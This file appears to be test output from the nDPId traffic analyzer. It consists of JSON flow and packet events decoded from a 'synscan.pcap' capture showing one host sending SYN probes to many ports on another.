-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6oAADoGqsisEAAIQA2GNIzTQmDdU4MZAAAAAGACDADqKwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpQAAC4G696sEAAIQA2GNIzTG2vdU4MZAAAAAGACDAARIQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLP4AADcG5HSsEAAIQA2GNIzTsCzdU4MZAAAAAGACEAB4XwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAslywAADcGekasEAAIQA2GNIzTCU3dU4MZAAAAAGACEAAfPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf0AACsG93WsEAAIQA2GNIzTEV3dU4MZAAAAAGACEAAXLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjYAADIG7DysEAAIQA2GNIzTBvfdU4MZAAAAAGACDAAllQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsqE0AACYGeiWsEAAIQA2GNIzSA4bdUoMYAAAAAGACDAApCQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAst3MAADIGXv+sEAAIQA2GNIzSDmrdUoMYAAAAAGACDAAeJQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs8wcAACsGKmusEAAIQA2GNIzSH5ndUoMYAAAAAGACEAAI9gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsHA8AADEG+2OsEAAIQA2GNIzSA\/LdUoMYAAAAAGACCAAsnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAshBYAACgGnFysEAAIQA2GNIzSINLdUoMYAAAAAGACBAATvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs7xUAADUGJF2sEAAIQA2GNIzSI4LdUoMYAAAAAGACCAANDQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3527,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1098,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsB\/UAADcGCX6sEAAIQA2GNIzSDcfdUoMYAAAAAGACEAAayAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAscu0AADMGooWsEAAIQA2GNIzSA+DdUoMYAAAAAGACEAAkrwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGAAADoG\/hKsEAAIQA2GNIzSIczdUoMYAAAAAGACDAAKwwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1101,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs5+oAADMGLYisEAAIQA2GNIzSAP\/dUoMYAAAAAGACEAAnkAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33354,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1102,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqIkAAC0GcumsEAAIQA2GNIzSgkrdUoMYAAAAAGACCACuRAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsqRIAADQGa2CsEAAIQA2GNIzSBBrdUoMYAAAAAGACBAAwdQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsXYYAACsGv+ysEAAIQA2GNIzSBvbdUoMYAAAAAGACEAAhmQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAsMa8AAC0G6cOsEAAIQA2GNIzSAZbdUoMYAAAAAGACCAAu+QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060177,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_packet_id":1,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060177,"pkt":"ACYLMQczACWzv5HuCABFAAAs1jgAADkGOTqsEAAIQA2GNIzSWZvdUoMYAAAAAGACCADW8wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1107,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsX6EAACgGwNGsEAAIQA2GNIzTCo7dU4MZAAAAAGACBAAp\/gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1108,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsYDUAADoGrj2sEAAIQA2GNIzTE6bdU4MZAAAAAGACDAAY5gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TwAADIGLTasEAAIQA2GNIzThw3dU4MZAAAAAGACDAClfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060181,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_packet_id":1,"flow_last_seen":1278275060181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060181,"pkt":"ACYLMQczACWzv5HuCABFAAAsEGcAACwGDAysEAAIQA2GNIzTBEvdU4MZAAAAAGACBAAwQQAAAgQFtA=="} 